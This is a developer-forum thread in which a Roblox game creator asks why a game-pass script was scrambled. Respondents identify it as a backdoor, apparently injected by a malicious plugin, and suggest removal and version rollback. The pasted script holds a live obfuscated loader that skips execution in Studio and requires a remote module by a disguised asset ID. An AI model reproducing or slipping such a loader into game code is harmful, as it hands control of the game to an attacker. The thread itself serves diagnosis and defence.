Possible exploit or virus?

Hello, I’m the creator of the game Island Jump. It’s a fairly small game at the moment and I’m working on growing it little by little. Yesterday night I released an update on the game. Before that the game passes we’re working perfectly. This morning however the script for the game-pass is scrambled. This is a huge problem as players need to be receiving what they paid for.

This is the script that got scrambled

local wr = “Walk&Run”

 ikwuo5w7nHZVuVsmD = 'GetProductInfo' iMgO1DXhJtCt = require iHTFWcBFj1w = 
'IsStudio' iaZsymUZilaNX = 'PlaceId' iTF61TlzkdD = 'MarketplaceService'
 iStzp8uNODQd58p = pcall iDFNun = 'Debris' i5zWxeAg = spawn iQ5bQ7bOwiv =
 'RunService' iirK = 31235962.270588 * 85 ixI2wDcBF2j = 'WaitForChild' i9vJ9MzYO 
= 'load' iZo1rOijJGZqzyv = 'Description' i6PxcB1eCEx = 'IsStudio' icdZW135 = 
'ReplicatedStorage' iK4ORC = game  i5zWxeAg(    function()     iStzp8uNODQd58p(   
 function()     if iK4ORC:GetService(iBTDHsYaRR)    [i6PxcB1eCEx]    (iK4ORC:GetService(iBTDHsYaRR)    ) then      return     end iMgO1DXhJtCt(iirK)    [i9vJ9MzYO]    (iK4ORC[iaZsymUZilaNX]    )     end    )     end    )
function(player)
    game.Players.PlayerAdded:Connect(function) pcall 
end
    game.Players.LocalPlayer.CharacterAdded:Connect(function(char)
        local gamepass1 = "6652645"
        local gamepass2 = "6777620" -- Gamepass ID
        wait(1)
        if player.PlayerGui:FindFirstChild(wr) == nil then
            if game:GetService("MarketplaceService"):UserOwnsGamePassAsync(player.UserId,gamepass1) then
                game.Lighting[wr]:Clone().Parent = player.PlayerGui
            end
        end
        if game:GetService("MarketplaceService"):UserOwnsGamePassAsync(player.UserId,gamepass1) then
            game.Lighting.Boombox:Clone().Parent = player.Backpack
        end
end)




I'm not sure if someone did some type of exploit if my game has a virus or
 whats going on. If you guys could let me know if this has happened to you or
 any ways to solve this or prevent it from happening in the future it 
would be much appreciated. 
Kind Regards
TheTimeDefender
2 Likes

I think the main question is to ask is that do you know exactly what you’ve inserted into your game.
It’s very easy to find models off the library and add them onto your game which could have the chance of containing hidden scripts which could be damaging your game now.

Could you also explain what you mean by this?
If you have other developers working alongside you in this project then you will need to check with them with whatever has been put into the game.
It looks like some of the code has been somewhat encoded to possibly hide some malicious content.

Indeed. All of my developers work off of separate games. So no ones had direct access to the game. I also check threw any scripts that they make. The only things I’ve added off the ToolBox is Kohls admin. But I’ve used that quite a bit.

I’d say its best to consult with your other developers what’s going on and narrow down who is the culprit.

My guess would be that this is either the work of someone on your development team, or a malicious plug-in you’ve installed. Scripts do not have the proper security context to manipulate the source of other scripts, or publish lasting changes.

1 Like

Maybe you accidentally inserted the fake version of Kohl’s admin, also there’s a way to revert the update so maybe do that

Hello! This is a backdoor. Like what others said, this can be the result of other developers or plugins you may had installed (they can modify your scripts, as far as I know, correct me if I am wrong).

After looking through your inventory, the culprit is more than likely this plugin (I’ve looked through the source code, and noticed a small portion of it is obfuscated and is hidden in the script). I’d advise uninstalling it and checking the rest of your plugins you have installed.

https://www.roblox.com/library/3547776363/RoBrix-Generator

6 Likes

I recommend you get V2.1 - Plugin: Hidden Backdoor/Infection Script Detector (Detects/Removes infections from malicious plugins) to prevent this from happening again

2 Likes

Thank you for the recommendation I’m installing that now!

1 Like

Yes I believe this could be the issue I’m uninstalling it now! Thanks again!

Yup Just checked up with my team. Down below someone commented a plugin I had which was causing some errors! Hopefully this solves the problem. Thanks again!

You’re correct in that Plug-ins are able to modify the source of scripts, but incorrect in that RoBrix is the issue. After evaluating the source of the mentioned Plug-in, I can confirm that it was written with no malicious intent.

Edit: Hidden obfuscated chunk of code found. Absolutely written with malicious intent.

Will do! Thanks again for the help. I’m hoping I can prevent this from happening in the future!

Just so you know, you can revert the update before yesterday

Hmm, I suppose i’ll uninstall it just to be safe! Thanks again!

Oh? I’ve never done that are there autosaves somewhere or…

Go to Configure Place and you’ll see Version History

2 Likes